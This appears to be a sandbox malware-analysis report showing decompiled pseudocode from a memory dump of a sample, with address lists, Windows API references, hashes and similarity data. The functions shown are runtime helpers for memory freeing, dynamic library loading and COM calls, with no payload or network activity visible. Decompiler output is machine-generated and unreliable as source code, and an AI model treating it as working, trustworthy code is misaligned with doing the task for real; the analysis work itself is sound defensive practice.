0x032a1933
0x032a1934
0x032a1935
0x032a1936
0x032a1936
0x032a1782
0x032a1782
0x032a1782
0x032a1782
0x032a1786
0x032a1789
0x032a178c
0x032a178f
0x032a1790
0x032a1790
0x032a175d
0x032a175d
0x032a1761
0x032a1761
0x032a1764
0x032a1767
0x032a176a
0x032a1794
0x032a1797
0x032a179a
0x032a179d
0x032a17a0
0x032a17a1
0x032a176c
0x032a176c
0x032a176f
0x032a1770
0x032a1770
0x032a176a
0x032a175b

APIs

Sleep.KERNEL32(00000000,?,032A1FC1), ref: 032A17D0
Sleep.KERNEL32(0000000A,00000000,?,032A1FC1), ref: 032A17E6

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: f8a2b184fe859e344a0a97e58e34267cd57bf61a78a29c811dc806cd31ee1f1d
Instruction ID: fbb5ee03ac0ce9bb49aaaa117df0068c21d50e69bf01bed26014fbf99c3ad224
Opcode Fuzzy Hash: f8a2b184fe859e344a0a97e58e34267cd57bf61a78a29c811dc806cd31ee1f1d
Instruction Fuzzy Hash: F9B12476A21B528FD715DF2CE894365FBE0EB85361F09C2AED4058F389C770A4A1C790

Uniqueness

Uniqueness Score: -1.00%

Function 032A1A8C Relevance: 7.7, APIs: 6, Instructions: 175
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E032A1A8C(void* __eax, void* __edi) {
				signed int __ebx;
				void* _t50;
				signed int _t51;
				signed int _t52;
				signed int _t54;
				void _t57;
				int _t58;
				signed int _t65;
				void* _t67;
				signed int _t69;
				intOrPtr _t70;
				signed int _t75;
				signed int _t76;
				signed int _t77;
				void* _t79;
				void* _t82;
				void _t85;
				void* _t87;
				void* _t89;

				_t48 = __eax;
				_t77 =  *(__eax - 4);
				_t65 =  *0x32db04d; // 0x0
				if((_t77 & 0x00000007) != 0) {
					__eflags = _t77 & 0x00000005;
					if((_t77 & 0x00000005) != 0) {
						_pop(_t65);
						__eflags = _t77 & 0x00000003;
						if((_t77 & 0x00000003) != 0) {
							return 0xffffffff;
						} else {
							_push(_t65);
							_t67 = __eax - 0x10;
							E032A1644();
							_t50 = _t67;
							_t85 =  *_t50;
							_t82 =  *(_t50 + 4);
							_t51 = VirtualFree(_t67, 0, 0x8000); // executed
							if(_t51 == 0) {
								_t52 = _t51 | 0xffffffff;
								__eflags = _t52;
							} else {
								 *_t82 = _t85;
								 *(_t85 + 4) = _t82;
								_t52 = 0;
							}
							 *0x32dd7a8 = 0;
							return _t52;
						}
					} else {
						goto L21;
					}
				} else {
					__eflags = __bl;
					__ebx =  *__edx;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L6;
							}
							Sleep(0);
							__edx = __edx;
							__ecx = __ecx;
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags != 0) {
								Sleep(0xa);
								__edx = __edx;
								__ecx = __ecx;
								continue;
							}
							goto L6;
						}
					}
					L6:
					_t6 = __edx + 0xc;
					 *_t6 =  *(__edx + 0xc) - 1;
					__eflags =  *_t6;
					__eax =  *(__edx + 8);
					if( *_t6 == 0) {
						__eflags = __eax;
						if(__eax == 0) {
							L12:
							 *(__ebx + 0xc) = __eax;
						} else {
							__eax =  *(__edx + 0x14);
							__ecx =  *(__edx + 4);
							 *(__eax + 4) = __ecx;
							 *(__ecx + 0x14) = __eax;
							__eax = 0;
							__eflags =  *((intOrPtr*)(__ebx + 0x10)) - __edx;
							if( *((intOrPtr*)(__ebx + 0x10)) == __edx) {
								goto L12;
							}
						}
						 *__ebx = __al;
						__eax = __edx;
						__edx =  *(__edx - 4);
						__bl =  *0x32db04d; // 0x0
						L21:
						__eflags = _t65;
						_t69 = _t77 & 0xfffffff0;
						_push(_t84);
						_t87 = _t48;
						if(__eflags != 0) {
							while(1) {
								_t54 = 0x100;
								asm("lock cmpxchg [0x32db718], ah");
								if(__eflags == 0) {
									goto L22;
								}
								Sleep(0);
								_t54 = 0x100;
								asm("lock cmpxchg [0x32db718], ah");
								if(__eflags != 0) {
									Sleep(0xa);
									continue;
								}
								goto L22;
							}
						}
						L22:
						__eflags = (_t87 - 4)[_t69] & 0x00000001;
						_t75 = (_t87 - 4)[_t69];
						if(((_t87 - 4)[_t69] & 0x00000001) != 0) {
							_t54 = _t69 + _t87;
							_t76 = _t75 & 0xfffffff0;
							_t69 = _t69 + _t76;
							__eflags = _t76 - 0xb30;
							if(_t76 >= 0xb30) {
								_t54 = E032A14C0(_t54);
							}
						} else {
							_t76 = _t75 | 0x00000008;
							__eflags = _t76;
							(_t87 - 4)[_t69] = _t76;
						}
						__eflags =  *(_t87 - 4) & 0x00000008;
						if(( *(_t87 - 4) & 0x00000008) != 0) {
							_t76 =  *(_t87 - 8);
							_t87 = _t87 - _t76;
							_t69 = _t69 + _t76;
							__eflags = _t76 - 0xb30;
							if(_t76 >= 0xb30) {
								_t54 = E032A14C0(_t87);
							}
						}
						__eflags = _t69 - 0x13fff0;
						if(_t69 == 0x13fff0) {
							__eflags =  *0x32db720 - 0x13fff0;
							if( *0x32db720 != 0x13fff0) {
								_t70 = _t87 + 0x13fff0;
								E032A1560(_t54);
								 *((intOrPtr*)(_t70 - 4)) = 2;
								 *0x32db720 = 0x13fff0;
								 *0x32db71c = _t70;
								 *0x32db718 = 0;
								__eflags = 0;
								return 0;
							} else {
								_t89 = _t87 - 0x10;
								_t57 =  *_t89;
								_t79 =  *(_t89 + 4);
								 *(_t57 + 4) = _t79;
								 *_t79 = _t57;
								 *0x32db718 = 0;
								_t58 = VirtualFree(_t89, 0, 0x8000);
								__eflags = _t58 - 1;
								asm("sbb eax, eax");
								return _t58;
							}
						} else {
							 *(_t87 - 4) = _t69 + 3;
							 *(_t87 - 8 + _t69) = _t69;
							E032A1500(_t87, _t76, _t69);
							 *0x32db718 = 0;
							__eflags = 0;
							return 0;
						}
					} else {
						__eflags = __eax;
						 *(__edx + 8) = __ecx;
						 *(__ecx - 4) = __eax;
						if(__eflags == 0) {
							__ecx =  *(__ebx + 4);
							 *(__edx + 0x14) = __ebx;
							 *(__edx + 4) = __ecx;
							 *(__ecx + 0x14) = __edx;
							 *(__ebx + 4) = __edx;
							 *__ebx = 0;
							__eax = 0;
							__eflags = 0;
							_pop(__ebx);
							return 0;
						} else {
							__eax = 0;
							__eflags = 0;
							 *__ebx = __al;
							_pop(__ebx);
							return 0;
						}
					}
				}
			}

0x032a1a8c
0x032a1a8c
0x032a1a95
0x032a1a9b
0x032a1b6c
0x032a1b6f
0x032a1c5c
0x032a1c5d
0x032a1c60
0x032a1c6b
0x032a16e8
0x032a16e8
0x032a16ed
0x032a16f0
0x032a16f5
0x032a16f7
0x032a16f9
0x032a1704
0x032a170b
0x032a1716
0x032a1716
0x032a170d
0x032a170d
0x032a170f
0x032a1712
0x032a1712
0x032a1719
0x032a1723
0x032a1723
0x00000000
0x00000000
0x00000000
0x032a1aa1
0x032a1aa1
0x032a1aa3
0x032a1aa5
0x032a1b08
0x032a1b08
0x032a1b0d
0x032a1b11
0x00000000
0x00000000
0x032a1b17
0x032a1b1c
0x032a1b1d
0x032a1b1e
0x032a1b23
0x032a1b27
0x032a1b31
0x032a1b36
0x032a1b37
0x00000000
0x032a1b37
0x00000000
0x032a1b27
0x032a1b08
0x032a1aa7
0x032a1aa7
0x032a1aa7
0x032a1aa7
0x032a1aab
0x032a1aae
0x032a1adc
0x032a1ade
0x032a1af3
0x032a1af3
0x032a1ae0
0x032a1ae0
0x032a1ae3
0x032a1ae6
0x032a1ae9
0x032a1aec
0x032a1aee
0x032a1af1
0x00000000
0x00000000
0x032a1af1
0x032a1af6
0x032a1af8
0x032a1afa
0x032a1afd
0x032a1b75
0x032a1b78
0x032a1b7a
0x032a1b7c
0x032a1b7d
0x032a1b7f
0x032a1b3c
0x032a1b3c
0x032a1b41
0x032a1b49
0x00000000
0x00000000
0x032a1b4d
0x032a1b52
0x032a1b57
0x032a1b5f
0x032a1b63
0x00000000
0x032a1b63
0x00000000
0x032a1b5f
0x032a1b3c
0x032a1b81
0x032a1b81
0x032a1b89
0x032a1b8d
0x032a1bc4
0x032a1bc7
0x032a1bca
0x032a1bcc
0x032a1bd2
0x032a1bd4
0x032a1bd4
0x032a1b8f
0x032a1b8f
0x032a1b8f
0x032a1b92
0x032a1b92
0x032a1b96
0x032a1b9a
0x032a1bdc
0x032a1bdf
0x032a1be1
0x032a1be3
0x032a1be9
0x032a1bed
0x032a1bed
0x032a1be9
0x032a1b9c
0x032a1ba2
0x032a1bf4
0x032a1bfe
0x032a1c2c
0x032a1c32
0x032a1c37
0x032a1c3e
0x032a1c48
0x032a1c4e
0x032a1c55
0x032a1c59
0x032a1c00
0x032a1c00
0x032a1c03
0x032a1c05
0x032a1c08
0x032a1c0b
0x032a1c0d
0x032a1c1c
0x032a1c21
0x032a1c24
0x032a1c28
0x032a1c28
0x032a1ba4
0x032a1ba7
0x032a1baa
0x032a1bb2
0x032a1bb7
0x032a1bbe
0x032a1bc2
0x032a1bc2
0x032a1ab0
0x032a1ab0
0x032a1ab2
0x032a1ab8
0x032a1abb
0x032a1ac4
0x032a1ac7
0x032a1aca
0x032a1acd
0x032a1ad0
0x032a1ad3
0x032a1ad6
0x032a1ad6
0x032a1ad8
0x032a1ad9
0x032a1abd
0x032a1abd
0x032a1abd
0x032a1abf
0x032a1ac1
0x032a1ac2
0x032a1ac2
0x032a1abb
0x032a1aae

APIs

Sleep.KERNEL32(00000000,?,?,00000000,032A1FE4), ref: 032A1B17
Sleep.KERNEL32(0000000A,00000000,?,?,00000000,032A1FE4), ref: 032A1B31

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 90db730d1453c34d43102e07d8fb866d727bfa720caf5ed2db01935d94d84167
Instruction ID: fa806b99e63fce96cd5b557f48b09704c60be44a9a4c1b444dd1501a195de233
Opcode Fuzzy Hash: 90db730d1453c34d43102e07d8fb866d727bfa720caf5ed2db01935d94d84167
Instruction Fuzzy Hash: FF512036A21B018FE715DF6CD984766BBD4AF45330F1885AED444CB38AE7B0E4A5C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 032B7C04 Relevance: 6.0, APIs: 4, Instructions: 49
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E032B7C04(intOrPtr __eax, void* __ecx, char __edx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				CHAR* _t22;
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t27;
				intOrPtr _t37;
				void* _t41;

				_v12 = __edx;
				_v8 = __eax;
				E032A4954(_v8);
				E032A4954(_v12);
				_push(_t41);
				_push(0x32b7ca2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t41 + 0xfffffff8;
				LoadLibraryExA(E032A4964(_v8), 0, 0); // executed
				 *0x32de344 = GetModuleHandleA(E032A4964(_v8));
				_t22 = E032A4964(_v12);
				_t23 =  *0x32de344; // 0x74180000
				 *0x32de348 = GetProcAddress(_t23, _t22);
				E032B7BD8(0x32a6748);
				_t27 =  *0x32de344; // 0x74180000
				FreeLibrary(_t27); // executed
				_pop(_t37);
				 *[fs:eax] = _t37;
				_push(0x32b7ca9);
				return E032A44C4( &_v12, 2);
			}

0x032b7c0a
0x032b7c0d
0x032b7c13
0x032b7c1b
0x032b7c22
0x032b7c23
0x032b7c28
0x032b7c2b
0x032b7c3c
0x032b7c4f
0x032b7c57
0x032b7c5d
0x032b7c68
0x032b7c77
0x032b7c7c
0x032b7c82
0x032b7c89
0x032b7c8c
0x032b7c8f
0x032b7ca1

APIs

LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,032B7CA2), ref: 032B7C3C
GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,032B7CA2), ref: 032B7C4A
GetProcAddress.KERNEL32(74180000,00000000), ref: 032B7C63
FreeLibrary.KERNEL32(74180000,74180000,00000000,00000000,00000000,00000000,00000000,00000000,032B7CA2), ref: 032B7C82

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: Library$AddressFreeHandleLoadModuleProc
String ID:
API String ID: 1437655972-0
Opcode ID: 7792699415741fce21b51a5113ec57868d7d5652f4ae4d0bada091a8d835ee15
Instruction ID: 63b834f2ff5b1df58195921be551a27e0bc62b00c0a25377f1150b8e1a654867
Opcode Fuzzy Hash: 7792699415741fce21b51a5113ec57868d7d5652f4ae4d0bada091a8d835ee15
Instruction Fuzzy Hash: 37018078A24B08AFC740FBADD945A6DB7B8EF45700FA54064A014EFB40D7B4DD908710

Uniqueness

Uniqueness Score: -1.00%

Function 032B70D4 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E032B70D4(intOrPtr* __eax, void* __ebx, intOrPtr* __ecx, signed char* __edx, void* __edi, void* __esi, void* __fp0, signed int _a4, signed int* _a8) {
				char _v36;
				intOrPtr* _v40;
				intOrPtr* _v44;
				signed int _v48;
				signed int _v52;
				signed int* _v56;
				signed int* _v60;
				signed int _v64;
				signed int* _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				char _v84;
				signed int _v1620;
				signed int _t140;
				intOrPtr _t141;
				intOrPtr* _t142;
				intOrPtr _t145;
				signed char _t153;
				signed char _t154;
				signed int* _t161;
				signed int _t203;
				signed int _t204;
				void* _t205;
				intOrPtr _t219;
				intOrPtr _t220;
				intOrPtr _t221;
				signed int _t250;
				intOrPtr _t251;
				signed char* _t253;
				void* _t256;
				void* _t257;
				intOrPtr _t258;
				void* _t272;

				_t272 = __fp0;
				_t256 = _t257;
				_t258 = _t257 + 0xfffff9b0;
				_v44 = __ecx;
				_t253 = __edx;
				_v40 = __eax;
				_t219 =  *0x32acd60; // 0x32acd64
				E032A4F04( &_v36, _t219);
				_push(_t256);
				_push(0x32b73ff);
				_push( *[fs:eax]);
				 *[fs:eax] = _t258;
				_v52 = 0;
				_t207 = 0;
				_push(_t256);
				_push(0x32b73dc);
				_push( *[fs:ecx]);
				 *[fs:ecx] = _t258;
				_t250 =  *(__edx + 1) & 0x000000ff;
				if(_t250 > 0x40) {
					_t207 =  *0x32da818; // 0x32b6a08
					E032AB02C(_t207, 1);
					E032A3E5C();
				}
				if(_t250 == 0) {
					L25:
					_v84 =  &_v1620;
					_v80 = _v44 + 4;
					_v76 = _t250;
					_v72 = _t253[2] & 0x000000ff;
					_t220 =  *_v44;
					_t140 =  *_t253 & 0x000000ff;
					if(_t140 != 4) {
						__eflags = _t140 - 1;
						if(__eflags == 0) {
							__eflags = _t250;
							if(__eflags == 0) {
								__eflags = _a4;
								if(__eflags != 0) {
									_t140 = 3;
								}
							}
						}
					} else {
						if((_v1620 & 0x00000fff) == 9) {
							_t140 = 8;
						}
						 *_v44 = 0xfffffffd;
						_v80 = _v80 - 4;
						_v72 = _v72 + 1;
					}
					_push(0);
					_push( &_v36);
					_push(_a4);
					_t210 =  &_v84;
					_push( &_v84);
					_push(_t140);
					_push(0);
					_t141 =  *0x32da858; // 0x32c9a04
					_push(_t141);
					_push(_t220);
					_t142 = _v40;
					_push(_t142);
					if( *((intOrPtr*)( *_t142 + 0x18))() != 0) {
						E032B76AC();
					}
					_t203 = _v52;
					if(_t203 == 0) {
						L39:
						_t145 = 0;
						_pop(_t221);
						 *[fs:eax] = _t221;
						_push(0x32b73e3);
						_t204 = _v52;
						if(_t204 == 0) {
							L41:
							return _t145;
						} else {
							goto L40;
						}
						do {
							L40:
							_t204 = _t204 - 1;
							_t145 =  *((intOrPtr*)(_t256 + _t204 * 8 - 0x250));
							_push(_t145);
							L032ACDB4();
						} while (_t204 != 0);
						goto L41;
					} else {
						do {
							_t203 = _t203 - 1;
							_t254 = _t256 + _t203 * 8 - 0x250;
							_t251 =  *((intOrPtr*)(_t256 + _t203 * 8 - 0x250 + 4));
							_t268 = _t251;
							if(_t251 != 0) {
								E032A5350( *_t254, _t210, _t251, _t268);
							}
						} while (_t203 != 0);
						goto L39;
					}
				} else {
					_v56 = _a8;
					_v60 = _t256 + (_t250 + _t250) * 8 - 0x650;
					_t205 = 0;
					do {
						_v60 = _v60 - 0x10;
						_t153 = _t253[_t205 + 3] & 0x000000ff;
						_v48 = _t153 & 0x7f;
						_t154 = _t153 & 0x00000080;
						if(_v48 != 0xa) {
							__eflags = _v48 - 0x48;
							if(_v48 != 0x48) {
								__eflags = _t154;
								if(_t154 == 0) {
									__eflags = _v48 - 0xc;
									if(_v48 != 0xc) {
										 *_v60 = _v48;
										_v60[2] =  *_v56;
										__eflags = _v48 - 5;
										if(_v48 >= 5) {
											__eflags = _v48 - 7;
											if(_v48 <= 7) {
												_t93 =  &_v56;
												 *_t93 =  &(_v56[1]);
												__eflags =  *_t93;
												_v60[3] =  *_v56;
											}
										}
									} else {
										__eflags =  *_v56 - 0x100;
										if( *_v56 != 0x100) {
											_t161 = _v56;
											 *_v60 =  *_t161;
											_v60[1] = _t161[1];
											_t207 = _v60;
											_v60[2] = _t161[2];
											_v60[3] = _t161[3];
											_v56 =  &(_v56[3]);
										} else {
											_v68 = _t256 + _v52 * 8 - 0x250;
											 *_v68 = E032A5374(_v56[2], _t207);
											_v68[1] = 0;
											 *_v60 = 8;
											_v60[2] =  *_v68;
											_v52 = _v52 + 1;
										}
									}
									goto L23;
								}
								__eflags = _v48 - 0xc;
								if(_v48 == 0xc) {
									__eflags =  *( *_v56) - 0x100;
									if( *( *_v56) == 0x100) {
										_t207 = 8;
										E032AEABC( *_v56, 8,  *_v56, _t250, _t272);
									}
								}
								 *_v60 = _v48 | 0x00004000;
								_v60[2] =  *_v56;
								goto L23;
							} else {
								_v64 = _t256 + _v52 * 8 - 0x250;
								__eflags = _t154;
								if(_t154 == 0) {
									 *_v64 = E032A5374( *_v56, _t207);
									__eflags = 0;
									 *(_v64 + 4) = 0;
									 *_v60 = 8;
									_v60[2] =  *_v64;
								} else {
									 *_v64 = E032A5374( *( *_v56), _t207);
									 *(_v64 + 4) =  *_v56;
									 *_v60 = 0x4008;
									_v60[2] = _v64;
								}
								_v52 = _v52 + 1;
								L23:
								_t98 =  &_v56;
								 *_t98 =  &(_v56[1]);
								__eflags =  *_t98;
								goto L24;
							}
						} else {
							 *_v60 = 0xa;
							_v60[2] = 0x80020004;
						}
						L24:
						_t205 = _t205 + 1;
					} while (_t250 != _t205);
					goto L25;
				}
			}

0x032b70d4
0x032b70d5
0x032b70d7
0x032b70e0
0x032b70e3
0x032b70e5
0x032b70eb
0x032b70f1
0x032b70f8
0x032b70f9
0x032b70fe
0x032b7101
0x032b7106
0x032b7109
0x032b710b
0x032b710c
0x032b7111
0x032b7114
0x032b7117
0x032b711e
0x032b7120
0x032b712d
0x032b7132
0x032b7132
0x032b7139
0x032b7300
0x032b7306
0x032b730f
0x032b7312
0x032b7319
0x032b731f
0x032b7321
0x032b7327
0x032b7351
0x032b7354
0x032b7356
0x032b7358
0x032b735a
0x032b735e
0x032b7360
0x032b7360
0x032b735e
0x032b7358
0x032b7329
0x032b7338
0x032b733a
0x032b733a
0x032b7342
0x032b7348
0x032b734c
0x032b734c
0x032b7365
0x032b736a
0x032b736e
0x032b736f
0x032b7372
0x032b7373
0x032b7374
0x032b7376
0x032b737b
0x032b737c
0x032b737d
0x032b7380
0x032b7388
0x032b738d
0x032b738d
0x032b7392
0x032b7397
0x032b73b5
0x032b73b5
0x032b73b7
0x032b73ba
0x032b73bd
0x032b73c2
0x032b73c7
0x032b73db
0x032b73db
0x00000000
0x00000000
0x00000000
0x032b73c9
0x032b73c9
0x032b73c9
0x032b73ca
0x032b73d1
0x032b73d2
0x032b73d7
0x00000000
0x032b7399
0x032b7399
0x032b7399
0x032b739a
0x032b73a1
0x032b73a4
0x032b73a6
0x032b73ac
0x032b73ac
0x032b73b1
0x00000000
0x032b7399
0x032b713f
0x032b7142
0x032b7150
0x032b7153
0x032b7155
0x032b7155
0x032b7159
0x032b7166
0x032b7169
0x032b716f
0x032b7189
0x032b718d
0x032b7203
0x032b7205
0x032b724c
0x032b7250
0x032b72cb
0x032b72d5
0x032b72d8
0x032b72dc
0x032b72de
0x032b72e2
0x032b72e4
0x032b72e4
0x032b72e4
0x032b72f0
0x032b72f0
0x032b72e2
0x032b7252
0x032b7255
0x032b725a
0x032b729a
0x032b72a2
0x032b72aa
0x032b72b0
0x032b72b3
0x032b72bc
0x032b72bf
0x032b725c
0x032b7266
0x032b7277
0x032b727e
0x032b7284
0x032b7292
0x032b7295
0x032b7295
0x032b725a
0x00000000
0x032b7250
0x032b7207
0x032b720b
0x032b7212
0x032b7217
0x032b7225
0x032b722a
0x032b722a
0x032b7217
0x032b723a
0x032b7244
0x00000000
0x032b718f
0x032b7199
0x032b719c
0x032b719e
0x032b71dd
0x032b71e2
0x032b71e4
0x032b71ea
0x032b71f8
0x032b71a0
0x032b71af
0x032b71b9
0x032b71bf
0x032b71cb
0x032b71cb
0x032b71fb
0x032b72f3
0x032b72f3
0x032b72f3
0x032b72f3
0x00000000
0x032b72f3
0x032b7171
0x032b7174
0x032b717d
0x032b717d
0x032b72f7
0x032b72f7
0x032b72f8
0x00000000
0x032b7155

APIs

SysFreeString.OLEAUT32(?), ref: 032B73D2

Strings

H, xrefs: 032B7189

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: FreeString
String ID: H
API String ID: 3341692771-2852464175
Opcode ID: 02e7b7fc3e0fb3a75fbe972e614ec56078fb4e449a1f736e5b8e831eb2cde5d4
Instruction ID: d5ebfd437356d5ca166a56f294249e460868e54afedde166dbf61f2db1d548e4
Opcode Fuzzy Hash: 02e7b7fc3e0fb3a75fbe972e614ec56078fb4e449a1f736e5b8e831eb2cde5d4
Instruction Fuzzy Hash: 5BB1E278A21609DFDB10CF99D880ADDBBF6FF89350F248169E845AB361D770A885CF50

Uniqueness

Uniqueness Score: -1.00%

Function 032AE3E0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E032AE3E0(intOrPtr _a4, signed short* _a8, intOrPtr _a12, char _a16) {
				void* _v8;
				char* _v12;
				char _v28;
				void* __ebp;
				signed int _t27;
				intOrPtr _t28;
				intOrPtr _t41;
				intOrPtr _t47;
				void* _t54;
				signed short* _t56;
				void* _t59;
				intOrPtr _t63;
				void* _t71;
				void* _t73;
				intOrPtr _t74;

				_t71 = _t73;
				_t74 = _t73 + 0xffffffe8;
				_t56 = _a8;
				if( *_t56 != 0x400c) {
					__eflags = _a4;
					if(_a4 != 0) {
						_push( &_v28);
						L032ACDC4();
						_v12 =  &_v28;
					} else {
						_v12 = 0;
					}
					_push(_t71);
					_push(0x32ae4d4);
					_push( *[fs:eax]);
					 *[fs:eax] = _t74;
					_t68 =  *_t56 & 0x0000ffff;
					_t27 =  *_t56 & 0xffff;
					__eflags = _t27 - 0x101;
					if(__eflags > 0) {
						_t28 = _t27 - 0x4009;
						__eflags = _t28;
						if(_t28 == 0) {
							goto L12;
						} else {
							__eflags = _t28 != 4;
							if(_t28 != 4) {
								goto L14;
							} else {
								goto L12;
							}
						}
					} else {
						if(__eflags == 0) {
							L12:
							__eflags =  *0x32de298;
							if( *0x32de298 != 0) {
								 *0x32de298(_v12, _t56, _a12,  &_a16); // executed
							}
						} else {
							_t47 = _t27 - 9;
							__eflags = _t47;
							if(_t47 == 0) {
								goto L12;
							} else {
								__eflags = _t47 == 4;
								if(_t47 == 4) {
									goto L12;
								} else {
									L14:
									_t41 = E032B2E88(_t68,  &_v8);
									__eflags = _t41;
									if(_t41 == 0) {
										E032ADC7C(_t59);
									} else {
										 *((intOrPtr*)( *_v8 + 0x10))( &_a16, _a12);
									}
								}
							}
						}
					}
					_pop(_t63);
					 *[fs:eax] = _t63;
					_push(0x32ae4db);
					__eflags = _v12;
					if(_v12 != 0) {
						E032AE7F0(_a4, _v12);
						return E032AE3C4( &_v28);
					}
					return 0;
				} else {
					_t54 = E032AE3E0(_a4, _t56[4], _a12, _a16);
					return _t54;
				}
			}

0x032ae3e1
0x032ae3e3
0x032ae3e8
0x032ae3f0
0x032ae40f
0x032ae413
0x032ae41f
0x032ae420
0x032ae428
0x032ae415
0x032ae417
0x032ae417
0x032ae42d
0x032ae42e
0x032ae433
0x032ae436
0x032ae439
0x032ae43c
0x032ae43f
0x032ae444
0x032ae454
0x032ae454
0x032ae459
0x00000000
0x032ae45b
0x032ae45b
0x032ae45e
0x00000000
0x00000000
0x00000000
0x00000000
0x032ae45e
0x032ae446
0x032ae446
0x032ae460
0x032ae460
0x032ae467
0x032ae476
0x032ae47c
0x032ae448
0x032ae448
0x032ae448
0x032ae44b
0x00000000
0x032ae44d
0x032ae44d
0x032ae450
0x00000000
0x032ae452
0x032ae481
0x032ae486
0x032ae48b
0x032ae48d
0x032ae4a6
0x032ae48f
0x032ae4a1
0x032ae4a1
0x032ae48d
0x032ae450
0x032ae44b
0x032ae446
0x032ae4ad
0x032ae4b0
0x032ae4b3
0x032ae4b8
0x032ae4bc
0x032ae4c6
0x00000000
0x032ae4ce
0x032ae4d3
0x032ae3f2
0x032ae402
0x032ae4e0
0x032ae4e0

APIs

VariantInit.OLEAUT32(?), ref: 032AE420

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: InitVariant
String ID:
API String ID: 1927566239-0
Opcode ID: 207a635f464c6db68b60c981151cadf601f8d6093fcad2b7768aa07757e7f6ce
Instruction ID: d67f127696dac3f33cea7bc9f5cd325f00320c56ae5ce2eb26f0acff7bb83776
Opcode Fuzzy Hash: 207a635f464c6db68b60c981151cadf601f8d6093fcad2b7768aa07757e7f6ce
Instruction Fuzzy Hash: 51316175A20A09EFDB10DFACD9849AE7BECFB08310F464461E904D7240D674D9D2C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 032B6D64 Relevance: 1.5, APIs: 1, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 32%

			E032B6D64(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __esi, void* __eflags) {
				char _v8;
				intOrPtr _t21;
				intOrPtr _t26;

				_push(0);
				_push(_t26);
				_push(0x32b6db1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t26;
				E032A4DA4( &_v8, __eax);
				_push(E032A4DB4(_v8)); // executed
				L032ACDAC(); // executed
				E032B6D54(_t9);
				_pop(_t21);
				 *[fs:eax] = _t21;
				_push(0x32b6db8);
				return E032A4C24( &_v8);
			}

0x032b6d67
0x032b6d71
0x032b6d72
0x032b6d77
0x032b6d7a
0x032b6d83
0x032b6d90
0x032b6d91
0x032b6d96
0x032b6d9d
0x032b6da0
0x032b6da3
0x032b6db0

APIs

CLSIDFromProgID.OLE32(00000000,?,00000000,032B6DB1,?,?,?,00000000), ref: 032B6D91

Part of subcall function 032A4C24: SysFreeString.OLEAUT32(032BD70C), ref: 032A4C32

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

